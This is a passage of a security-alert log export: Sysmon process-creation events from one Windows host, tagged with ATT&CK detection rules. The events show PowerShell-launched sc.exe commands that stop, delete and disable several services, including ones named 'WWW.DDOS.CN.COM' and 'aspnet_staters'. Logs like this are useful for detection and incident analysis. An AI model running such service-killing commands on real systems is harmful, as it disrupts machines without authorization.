Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.945"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010f59e2600}"",""processId"":""7744"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.278",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.917 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00103a9d2600} +ProcessId: 6284 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.921735900Z"",""eventRecordID"":""2998"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.917\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-00103a9d2600}\r\nProcessId: 6284\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.917"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-00103a9d2600}"",""processId"":""6284"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.264",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.899 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010569c2600} +ProcessId: 5604 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.902623300Z"",""eventRecordID"":""2997"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.899\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010569c2600}\r\nProcessId: 5604\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.899"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010569c2600}"",""processId"":""5604"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:27.220",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.848 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001089992600} +ProcessId: 7520 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.850273800Z"",""eventRecordID"":""2994"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.848\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001089992600}\r\nProcessId: 7520\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.848"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-001089992600}"",""processId"":""7520"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.652",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.779 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010ea962600} +ProcessId: 7608 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.782624300Z"",""eventRecordID"":""2991"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.779\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010ea962600}\r\nProcessId: 7608\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.779"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010ea962600}"",""processId"":""7608"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.626",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.761 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010c0952600} +ProcessId: 7796 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WWW.DDOS.CN.COM Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WWW.DDOS.CN.COM Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.766135700Z"",""eventRecordID"":""2990"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.761\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-0010c0952600}\r\nProcessId: 7796\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WWW.DDOS.CN.COM Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:58.761"",""processGuid"":""{df9fc3d3-b3b2-5ecf-0000-0010c0952600}"",""processId"":""7796"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WWW.DDOS.CN.COM Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:26.589",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:58.717 +ProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001020932600} +ProcessId: 2780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:58.721466800Z"",""eventRecordID"":""2988"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:58.717\r\nProcessGuid: {df9fc3d3-b3b2-5ecf-0000-001020932600}\r\nProcessId: 2780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo 